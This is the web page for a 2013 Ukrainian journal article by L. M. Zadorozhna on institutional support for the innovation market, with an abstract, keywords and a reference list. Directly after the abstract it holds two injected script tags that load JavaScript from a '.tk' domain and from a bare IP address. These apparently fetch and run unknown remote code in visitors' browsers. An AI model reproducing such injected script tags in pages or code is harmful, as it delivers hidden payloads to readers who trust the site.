ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.837.001:330.341.1
Сторінка молодого науковця

Теоретичні засади інституційного забезпечення розвитку ринку інновацій / Задорожна Л. М. // Економіка АПК. - 2013. - № 6 - С. 114

Розкрито сутність понять “інновація” та “інститути”. Розглянуто основні теоретичні аспекти інституційного забезпечення розвитку ринку інновацій і проаналізовано основні інституції, що забезпечують інноваційну діяльність у сучасних умовах господарювання. Висвітлено інституціональну систему, яка включає блоки інститутів, що гарантують комплексне забезпечення виконання відповідних функцій; охарактеризовано сучасну нормативно-правову базу стосовно науково-технічної та інноваційної діяльності; досліджено інновації залежно від об’єкта і предмета. Запропоновано кроки, які необхідно здійснити для утвердження ефективної національної інноваційної діяльності, адже глобальні виклики нового тисячоліття закликають до інституційних інновацій, пов’язаних із соціальними нормами й цінностями, ринковими стимулами, політичними системами тощо. Рис.: 3. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інновації, інституціоналізм, інститути, технології, інноваційні процеси, інноваційна діяльність, система

Список використаних джерел

  1. Jim Woodhill. Capacities for Institutional Innovation: A Complexity Perspective/ Jim Woodhill // IDS Bulletin Volume 41 Number 3. – May 2010. – P. 47-59.
  2. Julian Birkinshaw. The 5 Myths of Innovation/ Julian Birkinshaw, Cyril Bouquet and J.-L. Barsoux // Mit sloan management review vol. 52 no. 2. – winter 2011. – P. 43-50.
  3. Грінченко Ю.Л. Інституційні фактори формування та розвитку інноваційних систем в країнах, що розвиваються, та з перехідною економікою / Ю.Л. Грінченко // Економічні інновації. – Вип. 43. – 2011. – С. 73-83
  4. Дзюба С.Г. Організація й правове забезпечення інноваційної діяльності в Україні / С.Г. Дзюба, Г.С. Чубаренко // Реалії та перспективи інноваційного розвитку України (економічні, фінансові та правові аспекти). Зб. матер. Х Міжнар. наук.-практ. конф. молодих науковців 26 берез. 2010 р. – К.: УДУФМТ, 2010. – 208 с. – Ч. ІІ. – С. 161-163.
  5. Єрмолаєва В.В. Теоретичні основи дослідження інновацій / В.В. Єрмолаєва // Вісн. нац. ун-ту “Львів. політехніка.” Пробл. економіки та упр. – 2010. – №683. – С. 268-273.
  6. Житнецький І.В. Економічна сутність інновацій та інноваційної діяльності в ринкових умовах господарювання / І.В. Житнецький, Ю.Г. Левченко // Харчова промисловість. – 2008. – № 7. – С.117-121.
  7. Липов В.В. Визначення моделі інноваційного розвитку України: чинник інституціональної компліментарності / В.В. Липов // Вісн. Хмельницького нац. ун-ту. – 2009. – № 5.– Т. 1. – Економічні науки. – С. 81-86.
  8. Пєстова О.А. Інституціональні аспекти теорій інноваційного розвитку / О.А. Пєстова // Академічний огляд. – 2011. – № 2 (35). – С. 38-45.
  9. Федулова Л.І. Інститути інноваційного розвитку регіонів / Л.І. Федулова // Економічні інновації. – 2011. – Вип. 43. – С. 337-345.
  10. Шпикуляк О.Г. Інституціоналізація інноваційної діяльності в аграрній сфері економіки / О.Г. Шпикуляк, Л.І. Курило // Облік і фінанси АПК. – 2010. – № 3. – С. 114-117.
Читати статтю: 13_06_19.pdf